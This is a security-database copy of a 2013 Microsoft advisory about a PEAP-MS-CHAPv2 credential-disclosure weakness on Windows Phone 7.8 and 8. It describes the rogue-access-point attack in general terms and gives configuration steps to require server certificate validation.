Executive Summary

Summary
Title Wireless PEAP-MS-CHAPv2 Authentication Could Allow Information Disclosure
Informations
Name KB2876146 First vendor Publication 2013-08-04
Vendor Microsoft Last vendor Modification 1970-01-01
Severity (Vendor) N/A Revision 1.0

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector :
Cvss Base Score Not Defined Attack Range Not Defined
Cvss Impact Score Not Defined Attack Complexity Not Defined
Cvss Expoit Score Not Defined Authentication Not Defined
Calculate full CVSS 2.0 Vectors scores

Detail

General Information

Executive Summary

Microsoft is aware of a public report that describes a known weakness in the Wi-Fi authentication protocol known as PEAP-MS-CHAPv2 (Protected Extensible Authentication Protocol with Microsoft Challenge Handshake Authentication Protocol version 2), used by Windows Phones for WPA2 wireless authentication. In vulnerable scenarios, an attacker who successfully exploited this issue could achieve information disclosure against the targeted device. Microsoft is not currently aware of active attacks or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

To exploit this issue, an attacker controlled system could pose as a known Wi-Fi access point, causing the targeted device to automatically attempt to authenticate with the access point, and in turn allowing the attacker to intercept the victim's encrypted domain credentials. An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to obtain the victim's domain credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource.

Recommendation. Apply the suggested action to require a certificate verifying a wireless access point before starting an authentication process. Please see the Suggested Actions section of this advisory for more information.

Advisory Details

Affected Software

This advisory discusses the following devices.

Affected Device Operating System
Windows Phone 8
Windows Phone 7.8

Advisory FAQ

What is the scope of the advisory?
The purpose of this advisory is to notify customers that Microsoft is aware of a public report that describes a known weakness regarding the Wi-Fi authentication protocol known as PEAP-MS-CHAPv2. This issue affects Windows Phone devices. This issue affects the device operating systems that are listed in the Affected Software section.

Is this a security vulnerability that requires Microsoft to issue a security update?
No, this is not a security vulnerability that requires Microsoft to issue a security update. This issue is due to known cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol and is addressed through implementing configuration changes on the wireless access points and on Windows Phone 8 devices.

What might an attacker use the issue to do?
In most scenarios, an attacker who successfully exploited this issue could gain information disclosure of a victim's domain credentials from the targeted device. An attacker could re-use a victim's domain credentials to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource.

How could an attacker exploit the issue?
An attacker-controlled system could pose as a known Wi-Fi access point, causing the victim's device to automatically attempt to authenticate with the access point, and in turn allowing the attacker to intercept the victim's encrypted domain credentials. An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to obtain the victim's domain credentials.

What is PEAP-MS-CHAPv2?
PEAP-MS-CHAPv2 is a wireless authentication protocol used to authenticate a user to an access point with the intention of ensuring only authorized devices can connect to a wireless network. PEAP-MS-CHAPv2 is commonly used with WPA2 wireless protection protocol.

What is WPA2?
Wi-Fi Protected Access II (WPA2), IEEE 802.11i, is a security protocol used to ensure the confidentiality of wireless network communication and is the successor of WPA.

Suggested Actions

To help protect against exploitation of the issue described in this advisory, apply one of the following suggested actions:

  • Require a certificate verifying a wireless access point before starting an authentication process from Windows Phone 8 devices

    A Windows Phone 8 device can be configured to validate a network access point to help make sure the network is your companys network before starting an authentication process. This can be done by validating a certificate that's on your companys server. Only after validating the certificate is user name and password information sent to the authentication server, so the phone can connect to the Wi-Fi network.

    Issuing the certificate:

    Corporate IT issues the root certificate that can be used to validate the Wireless access point. The certificate should have an easy to remember name; for instance, "Contoso Corporate Root Certificate". This certificate could have already been provisioned via the IT managed MDM (Mobile Device Management solution).

    The certificate can be issued via an email message. The email message should also contain instructions from the IT department on how to turn on Wi-Fi certificate validation. For instance, the email message could contain the following steps.

    Configuring a Windows Phone 8 to require a certificate verifying a wireless access point:

    After receiving the root certificate from Corporate IT, each Windows Phone 8 user performs the following steps:

    Delete the previously configured Wi-Fi connection.

    1. In Settings, Wi-Fi, tap Advanced
    2. Tap and hold over the selected Wi-Fi network, and choose delete

    Create a new connection and enable server certificate validation.

    1. In Wi-Fi settings, tap on the enterprise Wi-Fi network access point which will open a Sign-in page
    2. Enter username and password
    3. Toggle "Validate Server Certificate" to On
    4. Tap to choose a certificate
    5. In the list of certificates to select, pick the root certificate issued from Corporate IT (for example, "Contoso Corporate Root Certificate"), and tap Done

  • Turn off Wi-Fi in Windows Phone devices

    In Settings, Wi-Fi, tap to toggle "Wi-Fi networking" to Off

Original Source

Url : http://www.microsoft.com/technet/security/advisory/2876146.mspx

Alert History

If you want to see full details history, please login or register.
0
Date Informations
2013-09-18 17:10:40
  • First insertion